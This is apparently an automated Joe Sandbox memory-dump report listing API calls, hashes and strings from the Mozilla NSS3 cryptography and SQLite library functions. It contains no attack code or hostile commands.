                                                                                                                                                                                                                                                      • Instruction ID: 70c3f2332e3683cd7be1ccafb7a99889834b05c428aea7eb262ce0210fa7ec44
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5444aae386b1c1956ca4bbce291b7c08c32af9fd46b49573d675359827723eb8
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44438074A08361CFD304CF16C590E5ABBE2BFC9318F14966DE8998B752D731E846CB92
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C4DC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6C4DDAE2,?), ref: 6C4DC6C2
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF0AE
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF0C8
                                                                                                                                                                                                                                                      • PK11_FindKeyByAnyCert.NSS3(?,?), ref: 6C4DF101
                                                                                                                                                                                                                                                      • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4DF11D
                                                                                                                                                                                                                                                      • SEC_ASN1EncodeItem_Util.NSS3(00000000,?,?,6C5A218C), ref: 6C4DF183
                                                                                                                                                                                                                                                      • SEC_GetSignatureAlgorithmOidTag.NSS3(?,00000000), ref: 6C4DF19A
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DF1CB
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C4DF1EF
                                                                                                                                                                                                                                                      • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6C4DF210
                                                                                                                                                                                                                                                        • Part of subcall function 6C4852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C4852F5
                                                                                                                                                                                                                                                        • Part of subcall function 6C4852D0: SEC_GetSignatureAlgorithmOidTag.NSS3(00000000,00000000), ref: 6C48530F
                                                                                                                                                                                                                                                        • Part of subcall function 6C4852D0: NSS_GetAlgorithmPolicy.NSS3(00000000,?), ref: 6C485326
                                                                                                                                                                                                                                                        • Part of subcall function 6C4852D0: PR_SetError.NSS3(FFFFE0B5,00000000,?,?,00000000,?,6C4DF1E9,?,00000000,?,?), ref: 6C485340
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C4DF227
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CFAB0: free.MOZGLUE(?,-00000001,?,?,6C46F673,00000000,00000000), ref: 6C4CFAC7
                                                                                                                                                                                                                                                      • SECOID_SetAlgorithmID_Util.NSS3(?,?,?,00000000), ref: 6C4DF23E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4CBE60: SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6C4DF2BB
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4DF3A8
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • SECKEY_DestroyPrivateKey.NSS3(?), ref: 6C4DF3B3
                                                                                                                                                                                                                                                        • Part of subcall function 6C482D20: PK11_DestroyObject.NSS3(?,?), ref: 6C482D3C
                                                                                                                                                                                                                                                        • Part of subcall function 6C482D20: PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C482D5F
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Util$Algorithm$Item_$Tag_$CopyDestroyFind$ErrorK11_PolicyPrivateSignatureZfree$Alloc_ArenaArena_CertEncodeFreeObjectValuefree
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1559028977-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_EnterMonitor.NSS3(FF000001,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002,00000000,?,6C4E7FFA,00000002), ref: 6C50DE33
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                                                        • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                                                        • Part of subcall function 6C50D000: PORT_ZAlloc_Util.NSS3(00000108,?,6C50DE74,6C4E7FFA,00000002,?,?,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002), ref: 6C50D008
                                                                                                                                                                                                                                                      • PR_ExitMonitor.NSS3(FF000001,?,?,?,?,?,00000000,6C4E7FFA,00000000,?,6C5123B9,00000002,00000000,?,6C4E7FFA,00000002), ref: 6C50DE57
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000088), ref: 6C50DEA5
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C50E069
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C50E121
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6C50E14F
                                                                                                                                                                                                                                                      • PK11_CreateContextBySymKey.NSS3(?,00000000,?,00000000), ref: 6C50E195
                                                                                                                                                                                                                                                      • PR_GetCurrentThread.NSS3 ref: 6C50E1FC
                                                                                                                                                                                                                                                        • Part of subcall function 6C502460: PR_SetError.NSS3(FFFFE005,00000000,6C5A7379,00000002,?), ref: 6C502493
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ErrorValue$CriticalEnterK11_MonitorSection$Alloc_ContextCreateCurrentExitFreeLeaveThreadUtilmemset
                                                                                                                                                                                                                                                      • String ID: application data$early application data$handshake data$key
                                                                                                                                                                                                                                                      • API String ID: 1461918828-2699248424
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B389F
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B38B3
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B38F1
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B390F
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C4B3923
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B3972
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B3996
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B39AE
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B39DB
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B3A16
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                                                        • Part of subcall function 6C51DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                                                        • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                                                      • TlsGetValue.KERNEL32 ref: 6C4B3A36
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B3A4E
                                                                                                                                                                                                                                                      • PR_Unlock.NSS3(?), ref: 6C4B3A77
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(00000000,00000000), ref: 6C4B3A8F
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Value$CriticalSectionUnlock$Enter$calloc$ErrorLeave
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1642523270-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FED0A
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FEE68
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3FEF87
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?), ref: 6C3FEF98
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3FF483
                                                                                                                                                                                                                                                      • %s at line %d of [%.10s], xrefs: 6C3FF492
                                                                                                                                                                                                                                                      • database corruption, xrefs: 6C3FF48D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong
                                                                                                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                                                                                                                                                                                      • API String ID: 4101233201-598938438
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • SECOID_FindOID_Util.NSS3(?), ref: 6C497DDC
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C478298,?,?,?,6C46FCE5,?), ref: 6C4D07BF
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PL_HashTableLookup.NSS3(?,?), ref: 6C4D07E6
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D081B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4D07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D0825
                                                                                                                                                                                                                                                      • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C497DF3
                                                                                                                                                                                                                                                      • PK11_PBEKeyGen.NSS3(?,00000000,00000000,00000000,?), ref: 6C497F07
                                                                                                                                                                                                                                                      • PK11_GetPadMechanism.NSS3(00000000), ref: 6C497F57
                                                                                                                                                                                                                                                      • PK11_UnwrapPrivKey.NSS3(?,00000000,00000000,?,0000001C,00000000,?,?,?,00000000,00000130,00000004,?), ref: 6C497F98
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6C497FC9
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C497FDE
                                                                                                                                                                                                                                                      • PK11_PBEKeyGen.NSS3(?,?,00000000,00000001,?), ref: 6C498000
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B9430: SECOID_GetAlgorithmTag_Util.NSS3(00000000,?,?,00000000,00000000,?,6C497F0C,?,00000000,00000000,00000000,?), ref: 6C4B943B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B9430: SECOID_FindOIDByTag_Util.NSS3(00000000,?,?), ref: 6C4B946B
                                                                                                                                                                                                                                                        • Part of subcall function 6C4B9430: SECITEM_ZfreeItem_Util.NSS3(00000000,00000001,?,?,?,?,?), ref: 6C4B9546
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C498110
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C49811D
                                                                                                                                                                                                                                                      • PK11_ImportPublicKey.NSS3(?,?,00000001), ref: 6C49822D
                                                                                                                                                                                                                                                      • SECKEY_DestroyPublicKey.NSS3(?), ref: 6C49823C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_Util$FindItem_Tag_Zfree$ErrorFreeHashLookupPublicTable$AlgorithmConstDestroyImportMechanismPrivUnwrap
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1923011919-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00000002,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?), ref: 6C40B039
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B090
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B0A2
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?,?,?), ref: 6C40B100
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,00000002,?,6C52CF46,?,6C3FCDBD,?,6C52BF31,?,?,?,?,?,?,?), ref: 6C40B115
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?,?,?,?,?,?,6C52CF46,?,6C3FCDBD,?,6C52BF31), ref: 6C40B12D
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F9EE0: EnterCriticalSection.KERNEL32(?,?,?,?,6C40C6FD,?,?,?,?,6C45F965,00000000), ref: 6C3F9F0E
                                                                                                                                                                                                                                                        • Part of subcall function 6C3F9EE0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,6C45F965,00000000), ref: 6C3F9F5D
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$sqlite3_free$EnterLeave$CloseHandle
                                                                                                                                                                                                                                                      • String ID: `Xl
                                                                                                                                                                                                                                                      • API String ID: 3155957115-2906863447
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PK11_PubDeriveWithKDF.NSS3 ref: 6C4A0F8D
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A0FB3
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE00E,00000000), ref: 6C4A1006
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(?), ref: 6C4A101C
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C4A1033
                                                                                                                                                                                                                                                      • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C4A103F
                                                                                                                                                                                                                                                      • PK11_FreeSymKey.NSS3(00000000), ref: 6C4A1048
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A108E
                                                                                                                                                                                                                                                      • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6C4A10BB
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,00000006,?), ref: 6C4A10D6
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,?), ref: 6C4A112E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,6C4A08C4,?,?), ref: 6C4A15B8
                                                                                                                                                                                                                                                        • Part of subcall function 6C4A1570: htonl.WSOCK32(?,?,?,?,?,?,?,?,?,6C4A08C4,?,?), ref: 6C4A15C1
                                                                                                                                                                                                                                                        • Part of subcall function 6C4A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A162E
                                                                                                                                                                                                                                                        • Part of subcall function 6C4A1570: PK11_FreeSymKey.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4A1637
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: K11_$FreeItem_Util$memcpy$AllocZfreehtonl$DeriveErrorWith
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1510409361-0
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C4C1F19
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000020), ref: 6C4C2166
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4C228F
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000010), ref: 6C4C23B8
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE001,00000000), ref: 6C4C241C
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$Error
                                                                                                                                                                                                                                                      • String ID: manufacturer$model$serial$token
                                                                                                                                                                                                                                                      • API String ID: 3204416626-1906384322
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: EnterCriticalSection.KERNEL32(?,?,?,6C45F9C9,?,6C45F4DA,6C45F9C9,?,?,6C42369A), ref: 6C3FCA7A
                                                                                                                                                                                                                                                        • Part of subcall function 6C3FCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C3FCB26
                                                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000C0A), ref: 6C40103E
                                                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(?), ref: 6C401139
                                                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 6C401190
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(00000000), ref: 6C401227
                                                                                                                                                                                                                                                      • sqlite3_log.NSS3(0000001B,delayed %dms for lock/sharing conflict at line %d,00000001,0000BCFE), ref: 6C40126E
                                                                                                                                                                                                                                                      • sqlite3_free.NSS3(?), ref: 6C40127F
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeavesqlite3_free$memsetsqlite3_log
                                                                                                                                                                                                                                                      • String ID: PXl$delayed %dms for lock/sharing conflict at line %d$winAccess
                                                                                                                                                                                                                                                      • API String ID: 2733752649-599401849
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C3F
                                                                                                                                                                                                                                                        • Part of subcall function 6C51C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C51C2BF
                                                                                                                                                                                                                                                      • PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C60
                                                                                                                                                                                                                                                      • PR_ExplodeTime.NSS3(00000000,6C471C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C471C6F,00000000,00000004,?,?), ref: 6C4C6C94
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Alloc_ArenaErrorExplodeTimeUtilValue
                                                                                                                                                                                                                                                      • String ID: gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                                                      • API String ID: 3534712800-180463219
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,-00000001), ref: 6C541027
                                                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C5410B2
                                                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C541353
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: memcpy$strlen
                                                                                                                                                                                                                                                      • String ID: $$%02x$%lld$'%.*q'$-- $NULL$zeroblob(%d)
                                                                                                                                                                                                                                                      • API String ID: 2619041689-2155869073
                                                                                                                                                                                                                                                      • Opcode ID: 9a21f5e22d29aa833ae8d57df20ee8051a500afd690f39b3d04bf3bb215b9c46
                                                                                                                                                                                                                                                      • Instruction ID: b706ec1af18f49776b24574a5296b55c8148aa7b2aedd4cdbb35940271324d8e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a21f5e22d29aa833ae8d57df20ee8051a500afd690f39b3d04bf3bb215b9c46
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F2E1AF75A08380DFD714CF25C880A6BBBF1AFC6348F14892DE98987B51E771E855CB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C548FEE
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5490DC
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C549118
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C54915C
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C5491C2
                                                                                                                                                                                                                                                      • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C549209
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _byteswap_ulong$Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                      • String ID: 3333$UUUU
                                                                                                                                                                                                                                                      • API String ID: 1967222509-2679824526
                                                                                                                                                                                                                                                      • Opcode ID: b28e4f32eba8fc58c79816c637ad2ddf0a0ca6bf65baf65cb1fd386395a79438
                                                                                                                                                                                                                                                      • Instruction ID: f6b5ddcf814d9d77b1de30727796fc655a8d2700ead46186cd8eea8324e8ba86
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b28e4f32eba8fc58c79816c637ad2ddf0a0ca6bf65baf65cb1fd386395a79438
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C5A1A272E001159BDB04CB68CD81BAEB7B9BF88324F0A8129D919B7741E736EC41CBD1
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C4DBD48
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000006,?), ref: 6C4DBD68
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C4DBD83
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000005,?), ref: 6C4DBD9E
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(0000000A,?), ref: 6C4DBDB9
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(00000007,?), ref: 6C4DBDD0
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000B8,?), ref: 6C4DBDEA
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000BA,?), ref: 6C4DBE04
                                                                                                                                                                                                                                                      • NSS_GetAlgorithmPolicy.NSS3(000000BC,?), ref: 6C4DBE1E
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.2228628820.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2228577015.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229010382.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229100458.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229162549.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229215975.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.2229279583.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_6c3f0000_DX0TGIT2LZWIIEDZ8Y3A15R.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: AlgorithmPolicy
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 2721248240-0
                                                                                                                                                                                                                                                      • Opcode ID: 723a4102b598834bc975c251d82f1556583ca59352abc1975d098b217f30361d
                                                                                                                                                                                                                                                      • Instruction ID: 903f240ee7ad57ad7270bb0d851cf4e57ecc02f6b71cad16f2afa42c86911af2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 723a4102b598834bc975c251d82f1556583ca59352abc1975d098b217f30361d
